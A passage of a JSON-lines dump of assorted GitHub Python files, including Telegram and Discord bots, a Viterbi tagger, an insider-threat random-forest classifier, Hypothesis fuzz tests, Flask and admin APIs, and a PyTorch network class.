recipes\\n2. Send /browse to look through all my recipes\"\"\")\n\ndef show_recipes(bot, update):\n \"Return recipes matching message\"\n m = RecipeManager()\n recipes = m.lookupRecipe(update.message.text.lower())\n for name, method in recipes:\n update.message.reply_text(name+'\\n\\n'+method)\n if len(recipes)==0:\n update.message.reply_text(\"Sorry, I don't know any recipes for %s\" %\n update.message.text)\n\ndef list_categories(bot, update):\n \"List recipe categories\"\n m = RecipeManager()\n\n keyboard = [[InlineKeyboardButton('%s\\n'%category, callback_data=category)] for\n category in m.listRecipeCategories()]\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n update.message.reply_text('Choose a category:', reply_markup=reply_markup)\n\n\ndef manage_callback(bot, update):\n cb_data = update.callback_query.data\n m = RecipeManager()\n if update.callback_query.message.text == 'Choose a category:':\n \"List recipes in category\"\n category = cb_data\n keyboard = [InlineKeyboardButton(recipe, callback_data=recipe) for\n recipe in m.listRecipes(category)]\n if len(keyboard) % 2 == 0:\n keyboard = np.reshape(keyboard, (len(keyboard) / 2,2))\n else:\n keyboard = [[key] for key in keyboard]\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n bot.edit_message_text(text='Choose a recipe:',\n reply_markup=reply_markup,\n chat_id=update.callback_query.message.chat_id,\n message_id=update.callback_query.message.message_id)\n elif update.callback_query.message.text == 'Choose a recipe:':\n \"Show selected recipe\"\n recipe = cb_data\n name, method = m.lookupRecipe(recipe, exact_match=True)\n bot.edit_message_text(text=name+'\\n\\n'+method,\n chat_id=update.callback_query.message.chat_id,\n message_id=update.callback_query.message.message_id)\n\ndef error(bot, update, error):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the EventHandler and pass it your bot's token.\n updater = Updater(TOKEN)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"help\", help))\n\n dp.add_handler(CommandHandler('browse', list_categories))\n dp.add_handler(CallbackQueryHandler(manage_callback))\n\n dp.add_handler(MessageHandler(Filters.text, show_recipes))\n # log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"peterjrichens/recipe_manager","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28952756956","text":"from parseinput import *\nfrom collections import defaultdict\nimport numpy as np\nimport math\n\nclass Viterbi:\n def __init__(self, lexicon, tags):\n self.tags = ['<START>', '<END>'] + tags #adding start and end tags\n self.trans_count = [] #count of arcs from s0 to s1\n self.emit_count = {} #count of emission of words in state s1\n self.state_count = [0]*len(self.tags) #count of words in state s\n self.tag_index = {}\n\n self.tp = []\n self.ep = {}\n i = 0\n for tag in self.tags:\n self.tag_index[tag] = i\n i = i + 1\n \n #initialize the transition matrix\n for tag in self.tags:\n self.trans_count.append([0] * len(self.tags))\n self.emit_count[self.tag_index[tag]] = dict()\n\n self.tp.append([0] * len(self.tags))\n self.ep[self.tag_index[tag]] = dict()\n\n #calculate the counts for all states and words(useful to calculate tp and ep)\n def getCounts(self, sentences):\n for sentence in sentences:\n sentence = [('<START>', '<START>')] + sentence + [('<END>', '<END>')]\n for i in range(len(sentence) - 1):\n word, tag_c = sentence[i]\n state = self.tag_index[tag_c]\n \n word_n, tag_n = sentence[i+1]\n n_state = self.tag_index[tag_n]\n\n self.trans_count[state][n_state] += 1\n\n d = self.emit_count[state];\n self.emit_count[state][word] = d.get(word, 0) + 1\n self.state_count[state] += 1\n\n\n def calculateProb(self):\n smoothingfactor = 0.0001\n for i in range(len(self.trans_count)):\n for j in range(len(self.trans_count[i])):\n try:\n self.tp[i][j] = float(self.trans_count[i][j])/float(self.state_count[i])\n except:\n self.tp[i][j] = 0.0\n\n for i in range(len(self.emit_count)):\n for word in self.emit_count[i].keys():\n try:\n self.ep[i][word] = float(self.emit_count[i][word])/float(self.state_count[i])\n except:\n self.ep[i][word] = 0.0\n\n def decode(self, sentence):\n N = len(sentence)\n \n T = len(self.tags)\n\n #viterbi table\n vt = np.zeros((N,T))\n bt = {}\n \n\n #for initialization - start tags\n start = self.tag_index['<START>']\n for tag in self.tags:\n ti = self.tag_index[tag]\n try:\n vt[0][ti] = self.tp[start][ti] * self.ep[ti][sentence[0]]\n except:\n vt[0][ti] = self.tp[start][ti] * 0.00000001\n bt[(0,tag)] = 0\n\n #Iteratively calculate for time 1 to N\n for i in xrange(1, N):\n for tag in self.tags:\n tag_id = self.tag_index[tag]\n prev_vt = {}\n for prev in self.tags:\n prev_id = self.tag_index[prev]\n prev_vt[(i-1, prev)] = vt[i-1][prev_id] * self.tp[prev_id][tag_id]\n \n try: \n vt[i][tag_id] = max(prev_vt.values()) * self.ep[tag_id][sentence[i]]\n except:\n vt[i][tag_id] = max(prev_vt.values()) * 0.00000001\n \n bt[(i,tag)] = max(prev_vt, key=prev_vt.get)\n \n prev_vt = {}\n #termination step\n for prev in self.tags:\n prev_id = self.tag_index[prev]\n prev_vt[(N-1, prev)] = vt[N-1][prev_id] * self.tp[prev_id][self.tag_index['<END>']]\n\n bt[(N, \"<END>\")] = max(prev_vt, key=prev_vt.get)\n \n sequence = []\n bp = bt[(N, \"<END>\")]\n while bp != 0:\n sequence.append(bp[1])\n bp = bt[bp]\n sequence.reverse()\n return [(sentence[i],sequence[i]) for i in xrange(0, len(sentence))]\n\n\n","repo_name":"Narasimman/NaturalLanguageProcessing","sub_path":"hmm-tagger/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1139892005","text":"import pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nhttp = pd.read_csv('D:/Datasets/r4.2/r4.2/http.csv')\r\nemail = pd.read_csv('D:/Datasets/r4.2/r4.2/email.csv')\r\nfile = pd.read_csv('D:/Datasets/r4.2/r4.2/file.csv')\r\nlogon = pd.read_csv('D:/Datasets/r4.2/r4.2/logon.csv')\r\n\r\ndata = pd.concat([http, email, file, logon])\r\n\r\ndata['date'] = pd.to_datetime(data['date'], format='%Y-%m-%d %H:%M:%S')\r\n\r\ndata['hour'] = data['date'].dt.hour\r\ndata['dayofweek'] = data['date'].dt.dayofweek\r\ndata['month'] = data['date'].dt.month\r\ndata['year'] = data['date'].dt.year\r\n\r\ndata = data.drop(['id', 'date', 'user', 'pc'], axis=1)\r\n\r\ndata = pd.get_dummies(data, columns=['activity'])\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(data.drop('threat', axis=1), data['threat'], test_size=0.3, random_state=42)\r\n\r\nmodel = RandomForestClassifier(n_estimators=100, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\naccuracy = accuracy_score(y_test, y_pred)\r\nprint('Accuracy: {:.2f}%'.format(accuracy*100))\r\n","repo_name":"im90866/InsiderThreatDetection","sub_path":"RF2.py","file_name":"RF2.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35646849036","text":"# This test code was written by the `hypothesis.extra.ghostwriter` module\r\n# and is provided under the Creative Commons Zero public domain dedication.\r\n\r\nimport datetime\r\nimport io\r\nimport typing\r\n\r\nimport _io\r\nfrom _io import StringIO\r\nfrom hypothesis import given\r\nfrom hypothesis import strategies as st\r\n\r\nimport markpickle\r\nimport markpickle.config_class\r\nfrom markpickle.serialize import unsafe_falsy_type, unsafe_scalar_type\r\n\r\n\r\n@given(\r\n # config class creates garbage if messed up\r\n config=st.just(\r\n markpickle.config_class.Config(infer_scalar_types=False)\r\n ), # .from_type(typing.Optional[markpickle.config_class.Config]),\r\n value=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.text(),\r\n ),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.lists(\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n )\r\n ),\r\n st.text(),\r\n ),\r\n)\r\ndef test_roundtrip_dumps_loads(\r\n config: typing.Optional[markpickle.config_class.Config],\r\n value: typing.Union[\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n dict[\r\n str,\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n ],\r\n ],\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n list[dict[str, typing.Union[None, str, int, float, datetime.date]]],\r\n ],\r\n str,\r\n ],\r\n) -> None:\r\n if unsafe_falsy_type(value):\r\n # falsies will not roundtrip.\r\n return\r\n if unsafe_scalar_type(value):\r\n # non-strings will not roundtrip.\r\n return\r\n\r\n value0 = markpickle.dumps(value=value, config=config)\r\n value1 = markpickle.loads(value=value0, config=config)\r\n if value != value1:\r\n print(\"whoa\")\r\n assert value == value1, (value, value1)\r\n\r\n\r\n@given(\r\n infer_scalar_types=st.booleans(),\r\n true_values=st.lists(st.text()),\r\n false_values=st.lists(st.text()),\r\n none_values=st.lists(st.text()),\r\n empty_string_is=st.text(),\r\n serialize_headers_are_dict_keys=st.booleans(),\r\n serialize_dict_as_table=st.booleans(),\r\n serialize_child_dict_as_table=st.booleans(),\r\n none_string=st.text(),\r\n)\r\ndef test_fuzz_Config(\r\n infer_scalar_types: bool,\r\n true_values: list[str],\r\n false_values: list[str],\r\n none_values: list[str],\r\n empty_string_is: str,\r\n serialize_headers_are_dict_keys: bool,\r\n serialize_dict_as_table: bool,\r\n serialize_child_dict_as_table: bool,\r\n none_string: str,\r\n) -> None:\r\n markpickle.Config(\r\n infer_scalar_types=infer_scalar_types,\r\n true_values=true_values,\r\n false_values=false_values,\r\n none_values=none_values,\r\n empty_string_is=empty_string_is,\r\n serialize_headers_are_dict_keys=serialize_headers_are_dict_keys,\r\n serialize_dict_as_table=serialize_dict_as_table,\r\n serialize_child_dict_as_table=serialize_child_dict_as_table,\r\n none_string=none_string,\r\n )\r\n\r\n\r\n@given(\r\n value=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.text(),\r\n ),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.lists(\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n )\r\n ),\r\n st.text(),\r\n ),\r\n stream=st.just(io.StringIO),\r\n config=st.from_type(typing.Optional[markpickle.config_class.Config]),\r\n)\r\ndef test_fuzz_dump(\r\n value: typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n dict[\r\n str,\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n ],\r\n ],\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n list[dict[str, typing.Union[None, str, int, float, datetime.date]]],\r\n ],\r\n stream: io.IOBase,\r\n config: typing.Optional[markpickle.config_class.Config],\r\n) -> None:\r\n markpickle.dump(value=value, stream=stream, config=config)\r\n\r\n\r\n@given(\r\n value=st.builds(StringIO),\r\n config=st.from_type(typing.Optional[markpickle.config_class.Config]),\r\n)\r\ndef test_fuzz_load(value: _io.StringIO, config: typing.Optional[markpickle.config_class.Config]) -> None:\r\n markpickle.load(value=value, config=config)\r\n","repo_name":"matthewdeanmartin/markpickle","sub_path":"test_hypothesis/test_hypothesis.py","file_name":"test_hypothesis.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19629437630","text":"from flask import Blueprint, request\nfrom Response import Response\nfrom Models.AgriWatchView import AgriWatchView\nfrom Services.AgriWatchViewService import AgriWatchViewService\nfrom Services.AuthenticationService import AuthenticationService\nfrom flask_restplus import Resource, Namespace\n\nAgriWatchViewService = AgriWatchViewService()\nAuthenticationService = AuthenticationService()\nview_ns = Namespace('view', 'view methods')\n\n@view_ns.route('/create')\nclass CreateNewView(Resource):\n @view_ns.doc(\n responses = {\n 400: \"Create new AgriWatch view error.\"\n },\n params = {\n 'SID': {'in': 'cookies', 'required': True},\n }\n )\n def post(self):\n if (\"SID\" not in request.cookies):\n return Response(\"No session detected\", status=400)\n \n view = AgriWatchViewService.createView(request)\n\n return Response(str(view.dataset)+str(view.visualType))\n\n@view_ns.route('/fetch')\nclass FetchViews(Resource):\n @view_ns.doc(\n responses = {\n 400: \"Error fetching AgriWatch views.\"\n },\n params = {\n 'SID': {'in': 'cookies', 'required': True},\n }\n )\n def get(self):\n retList = []\n user = AuthenticationService.verifySessionAndReturnUser(request.cookies[\"SID\"])\n\n views = AgriWatchView.objects.filter(author=user).order_by('-dateCreated')\n\n for view in views:\n if view == None:\n return Response(\"No views found\", status=400)\n retList.append(AgriWatchViewService.makeViewObject(view))\n return Response(retList)","repo_name":"Agriworks/agriworks_platform","sub_path":"Controllers/AgriWatchViewController.py","file_name":"AgriWatchViewController.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35035522324","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Q) \n# \n# N개의 수로 된 수열 A[1], A[2], …, A[N] 이 있다. 이 수열의 i번째 수부터 j번째 수까지의 합 A[i] + A[i+1] + … + A[j-1] + A[j]가 M이 되는 경우의 수를 구하는 프로그램을 작성하시오.\n\n# # A) \n# \n# 1) start point, end point(원소의 인덱스)를 0으로 시작해서, \n# \n# 2) tmp가 요구한 값보다 작으면 end point를 +1을함 \n# \n# 3) tmp가 m과 같으면 cnt에 +1을하고 start point에 +1을한다 \n# \n# 4) tmp가 m보다 크면 tmp에 start point의 숫자를 뺀 뒤, start point에 +1을 함 \n# \n\n# In[8]:\n\n\nn,m = map(int,input().split())\nnum = list(map(int,input().split()))\ntmp = num[0]\ncnt, sp, ep = 0, 0, 0\n\nwhile True:\n if tmp < m: # 부분합이 m보다 작으면 end point +1 \n ep += 1\n if ep >= n: #end point가 n보다 크면 while문 빠져나감 \n break\n tmp += num[ep]\n elif tmp == m :\n cnt += 1\n tmp -= num[sp]\n sp += 1\n else: \n tmp -= num[sp]\n sp += 1\nprint(cnt)\n\n","repo_name":"YONJUS/Coding-Test","sub_path":"22_백준_2003_수들의합_그리디.py","file_name":"22_백준_2003_수들의합_그리디.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34734288056","text":"import datetime\nfrom data import db_session\nfrom data.Inner.AuditlogAPI import add_auditlog\nfrom data.phone import Phone\nfrom data.Inner.main_file import raise_error, check_admin_status\n\n\ndef find_by_id(id, session):\n phone = session.query(Phone).get(id)\n if not phone:\n return raise_error(f\"Номер телефона не найден\", session), 1\n return phone, session\n\n\ndef get_phone_list():\n session = db_session.create_session()\n phones = session.query(Phone).all()\n session.close()\n return [item.to_dict(only=('id', 'number')) for item in phones]\n\n\ndef edit_phone(phone_id, args):\n if not all(args[key] is not None for key in ['admin_email', 'action']):\n return raise_error('Пропущены некоторые важные аргументы')\n admin, session = check_admin_status(args['admin_email'])\n phone, session = find_by_id(phone_id, session)\n if type(phone) == dict:\n session.close()\n return phone\n if args['action'] == \"get\":\n session.close()\n return phone.to_dict(only=('id', 'number'))\n elif args['action'] == 'delete':\n session.delete(phone)\n session.commit()\n add_auditlog(\"Удаление\", f\"Админ {admin.name} {admin.surname} удаляет номер телефона {phone.number}\", admin,\n datetime.datetime.now())\n session.close()\n return {\"success\": f\"Номер телефона {phone.number} успешно удалён\"}\n elif args['action'] == 'put':\n count = 0\n phone_dict = phone.to_dict(only=('number',))\n keys = list(filter(lambda key: args[key] is not None and key in phone_dict and args[key] != phone_dict[key], args.keys()))\n for key in keys:\n count += 1\n if key == 'number':\n if session.query(Phone).filter(Phone.number == args['number']).first():\n raise_error(\"Этот номер телефона уже существует\", session)\n phone.number = args[\"number\"]\n if count == 0:\n return raise_error(\"Пустой запрос\", session)\n phone_dict_2 = phone.to_dict(only=('number',))\n list_chang = [f'изменяет {key} с {phone_dict[key]} на {phone_dict_2[key]}' for key in keys]\n session.commit()\n add_auditlog(\"Изменение\", f\"Админ {admin.name} {admin.surname} изменяет номер телефона {phone.number}:\"\n f\" {', '.join(list_chang)}\", admin, datetime.datetime.now())\n session.close()\n return {\"success\": f\"Номер телефона {phone.number} успешно изменён\"}\n return raise_error(\"Неизвестный метод\", session)\n\n\ndef create_phone(args):\n if not all(args[key] is not None for key in ['number', 'admin_email']):\n return raise_error('Пропущены некоторые аргументы, необходимые для добавления нового номера телефона')\n admin, session = check_admin_status(args['admin_email'])\n if session.query(Phone).filter(Phone.number == args['number']).first():\n return raise_error(\"Этот номер телефона уже существует\", session)\n new_phone = Phone()\n new_phone.number = args[\"number\"]\n session.add(new_phone)\n session.commit()\n add_auditlog(\"Создание\", f\"Админ {admin.name} {admin.surname} добавляет номер телефона {new_phone.number}: {new_phone.to_dict(only=('id', 'number'))}\",\n admin, datetime.datetime.now())\n session.close()\n return {'success': f'Номер телефона {new_phone.number} создан'}\n","repo_name":"nikniksham/website_bc","sub_path":"data/Inner/PhoneAPI.py","file_name":"PhoneAPI.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25944083419","text":"import discord\nfrom discord.ext import commands\nfrom core.classes import Cog_Extension\nfrom core import check\nimport json\nimport os, random, datetime, requests\n\nwith open('setting.json', 'r', encoding='utf8') as jfile:\n\tjdata = json.load(jfile)\n\nclass Main(Cog_Extension):\n\t@commands.command()\n\tasync def ping(self, ctx):\n\t\tawait ctx.send(f'{round(self.bot.latency*1000)} ms')\n\n\n\t@commands.command()\n\t@check.valid_user() #檢查權限, 是否存在於效人員清單中, 否則無法使用指令\n\tasync def test(self, ctx):\n\t\tawait ctx.send('Bee! Bo!')\n\t\t\n\n\t@commands.command()\n\tasync def sayd(self, ctx, *, content: str):\n\t\tif \"@everyone\" in content:\n\t\t\tawait ctx.send(f\"{ctx.author.mention} Do not ping `everyone` !\")\n\t\t\tawait ctx.message.delete()\n\t\t\treturn\n\t\telse: await ctx.message.delete()\n\t\tawait ctx.send(content)\n\t\n\n\t@commands.Cog.listener()\n\tasync def on_raw_reaction_add(self, data):\n\t\tif data.message_id == (839110873011191814):\n\t\t\tif str(data.emoji) == '<:pogchamp:839098827427545118>':\n\t\t\t\tguild = self.bot.get_guild(data.guild_id)\n\t\t\t\trole = guild.get_role(839100920095965234)\n\t\t\t\tawait data.member.add_roles(role)\n\t\t\t\tawait data.member.send(f\"You get {role} role!\")\n\n\t@commands.Cog.listener()\n\tasync def on_raw_reaction_remove(self, data):\n\t\tif data.message_id == (839110873011191814):\n\t\t\tif str(data.emoji) == '<:pogchamp:839098827427545118>':\n\t\t\t\tguild = self.bot.get_guild(data.guild_id)\n\t\t\t\tuser = await guild.fetch_member(data.user_id)\n\t\t\t\trole = guild.get_role(839100920095965234)\n\t\t\t\tawait user.remove_roles(role)\n\t\t\t\tawait user.send(f\"You remove {role} role!\")\n\n\n\t@commands.Cog.listener()\n\tasync def on_message_delete(self, msg):\n\t\tembed = discord.Embed(title=\"There is a member deleted the message!\", description=\"\", color= 0x28ddb0)\n\t\tembed.add_field(name=\"Message sender \", value= str(msg.author.mention), inline=False)\n\t\tembed.add_field(name=\"Deleted message\", value= str(msg.content) , inline=True)\n\t\tawait msg.channel.send(embed=embed)\n\n\t@commands.command()\n\tasync def info(self, ctx):\n\t\tembed = discord.Embed(title=\"About GGR-bot\", description=\"This bot is testing!\", color= 0x28ddb0)\n\t\tembed.add_field(name=\"Developers\", value=\"<@!538639229220028416>\", inline=True)\n\t\tembed.add_field(name=\"Support Server\", value=\"[Server Link](https://discord.gg/jgpqZpJ6QQ)\" , inline=True)\n\t\tembed.add_field(name=\"Version\", value=\"BETA 0.1.0\", inline=False)\n\t\tembed.add_field(name=\"Powered by\", value=\"discord.py v{}\".format(discord.__version__), inline=True)\n\t\tembed.add_field(name=\"Prefix\", value=jdata['Prefix'], inline=True)\n\t\tembed.add_field(name=\"Invite\", value=\"[Invite Link](https://discord.com/api/oauth2/authorize?client_id=837656833413873725&permissions=8&scope=bot)\" , inline=False)\n\t\tembed.set_thumbnail(url=\"https://cdn.discordapp.com/attachments/838370690109407242/839480933027282984/GGR.png\")\n\t\tawait ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(Main(bot))","repo_name":"GGReric/GGR_bot","sub_path":"cmds/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23837219110","text":"import datetime\nimport re\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\nfrom telethon.tl.types import DocumentAttributeFilename\n\nfrom .. import bot\nfrom ..handlers.commandhandler import CommandHandler\n\n\n@CommandHandler.handler(\n command=\"nightly\", prefixes=['!', '/', '#'],\n chats=[-1001361570927, -1001374518507])\nasync def get_nightly(event):\n \"\"\"Fetch the latest Aurora Store Nightly\"\"\"\n reply = await event.reply(\"`Fetching apk file ...`\")\n chat = await event.get_chat()\n if chat.id == 1361570927:\n url = \"https://auroraoss.com/AuroraStore/Nightly/\"\n else:\n url = \"https://auroraoss.com/AuroraDroid/Nightly/\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as get:\n if get.status in [200, 201]:\n soup = BeautifulSoup(await get.text(), features=\"html.parser\")\n nightlies = {}\n for td in soup.find_all(\"tr\"):\n version = td.find(\"td\", class_=\"fb-n\")\n date = td.find(\"td\", class_=\"fb-d\")\n if version and date:\n try:\n nightlies.update({datetime.datetime.strptime(\n date.text, \"%Y-%m-%d %H:%M\"): version.text})\n except ValueError:\n pass\n latest_date = sorted(nightlies.keys(), reverse=True)[0]\n latest_version = nightlies[latest_date]\n async with session.get(f\"{url}{latest_version}\") as apk:\n await bot.send_file(event.chat, await apk.read(), caption=f\"**Aurora Nightly uploaded at** `{latest_date.strftime('%Y-%m-%d %H:%M')}`\",\n attributes=[DocumentAttributeFilename(file_name=latest_version)])\n await reply.delete()\n\n__HELP__ = \"\"\"\\n• __`nightly` - Get the latest Aurora Nightly available. (This command can also be used as a note)__\"\"\"\n","repo_name":"im-Satyendra/bug","sub_path":"bot/modules/nightlty.py","file_name":"nightlty.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71611164713","text":"import moviepy.editor as mp\r\n\r\ndef sound(path,token):\r\n print(\"vts1\")\r\n my_clip = mp.VideoFileClip(path)\r\n print(\"vts2\")\r\n temp = \"my_result\" + str(token) + \".wav\"\r\n my_clip.audio.write_audiofile(temp)\r\n print(\"vts3\")\r\n return temp","repo_name":"BrooCode/Semi-live","sub_path":"backend/vts.py","file_name":"vts.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39012800310","text":"import copy \nimport datetime\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom torch.nn.utils import clip_grad_norm_\nfrom .utils import logmsg\n\nclass BLNN(torch.nn.Module):\n ''' Classic neural network implementation which serves as a baseline NN model '''\n\n stats_dict = {'training': [],\n 'testing': [],\n 'grad_norms': [],\n 'grad_stds': []}\n\n def __init__(self, d_in, d_hidden, d_out, activation_fn):\n super(BLNN, self).__init__()\n self.layers = torch.nn.ModuleList()\n self.nonlinearity = []\n self.d_in = d_in\n self.d_out = d_out\n self.d_hidden = d_hidden\n #self.loss_fn = BLNN.xy_loss\n self.loss_fn = torch.nn.MSELoss()\n\n if activation_fn == 'Tanh':\n nonlinear_fn = torch.nn.Tanh()\n elif activation_fn == 'ReLU':\n nonlinear_fn = torch.nn.ReLU()\n\n self.layers.append(torch.nn.Linear(d_in, d_hidden[0]))\n self.nonlinearity.append(nonlinear_fn)\n\n for i in range(len(d_hidden) - 1):\n self.layers.append(torch.nn.Linear(d_hidden[i], d_hidden[i + 1]))\n self.nonlinearity.append(nonlinear_fn)\n\n self.last_layer = torch.nn.Linear(d_hidden[-1], d_out, bias=None)\n\n for i in range(len(self.layers)):\n torch.nn.init.orthogonal_(self.layers[i].weight)\n\n torch.nn.init.orthogonal_(self.last_layer.weight)\n #logmsg(\"model: {}\".format(self))\n\n def init_device(self):\n self.device = self.state_dict()['layers.0.weight'].get_device()\n self.sdevice = torch.device(f\"cuda:{self.device}\" if self.device >= 0 else \"cpu\")\n self.loss_fn = self.loss_fn.to(self.sdevice)\n\n return self.device\n\n def forward(self, x):\n dict_layers = dict(zip(self.layers, self.nonlinearity))\n for layer, nonlinear_transform in dict_layers.items():\n out = nonlinear_transform(layer(x))\n x = out\n return self.last_layer(out)\n\n def time_derivative(self, x):\n return self(x)\n\n def average_gradients(self):\n size = float(dist.get_world_size())\n for param in self.parameters():\n dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)\n param.grad.data /= size\n\n def validate(self, args, data, device):\n self.eval()\n #loss_fn = torch.nn.MSELoss().to(device)\n device = self.state_dict()['layers.0.weight'].get_device()\n if args.input_noise != '':\n npnoise = np.array(args.input_noise, dtype=\"float\")\n noise = torch.tensor(npnoise).to(device)\n\n # the validation data stream is configured to return the entire set in a \n # single, randomized batch:\n with torch.no_grad():\n for x, dxdt in data:\n dxdt_hat = self.time_derivative(x)\n if args.input_noise != '':\n dxdt_hat += noise * torch.randn(*x.shape).to(device) # add noise, maybe\n return self.loss_fn(dxdt_hat, dxdt).item()\n #return loss_fn(dxdt_hat, dxdt).item()\n\n # epoch train:\n def etrain(self, args, train_data, optimizer):\n self.train()\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n stats = copy.deepcopy(BLNN.stats_dict)\n addnoise = False\n if args.input_noise != '':\n addnoise = True\n npnoise = np.array(args.input_noise, dtype=\"float\")\n noise = torch.tensor(npnoise).to(torchdev)\n\n batches = 0\n for x, dxdt in train_data:\n optimizer.zero_grad()\n dxdt_hat = self.time_derivative(x)\n if addnoise:\n dxdt_hat += noise * torch.randn(*x.shape).to(torchdev) # add noise, maybe\n loss = self.loss_fn(dxdt_hat, dxdt)\n loss.backward()\n self.average_gradients()\n if args.clip != 0:\n clip_grad_norm_(self.parameters(), args.clip)\n optimizer.step()\n\n grad = torch.cat([p.grad.flatten() for p in self.parameters()])\n stats['training'].append(loss.item())\n stats['grad_norms'].append((grad @ grad).item())\n stats['grad_stds'].append(grad.std().item())\n\n if args.verbose and ((batches % args.print_every == 0) and self.device <= 0):\n grad_norm = grad @ grad\n logmsg(\"batch[{}] train loss {:.4e}, grad norm: {:.4e}, grad std: {:.4e}\"\n .format(batches, loss.item(), grad_norm, grad.std()))\n logmsg('\\tgrad: {}'.format(grad))\n for name, param in self.named_parameters():\n logmsg('\\t{}: {}'.format(name, param.data))\n logmsg('x: {}'.format(x))\n logmsg('dxdt: {}'.format(dxdt))\n batches += 1\n\n return stats\n\n def set_label(self, label):\n self.run_label = label\n\n def xy_loss(dxhat, dx):\n loss = ((dxhat - dx)**2).sum()\n return loss\n","repo_name":"ScottThomasMiller/ScottsML","sub_path":"gpu/nail/hnn/blnn.py","file_name":"blnn.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42556767711","text":"# https://leetcode.com/problems/majority-element-ii/\n\nclass Solution:\n def majorityElement(self, nums: List[int]) -> 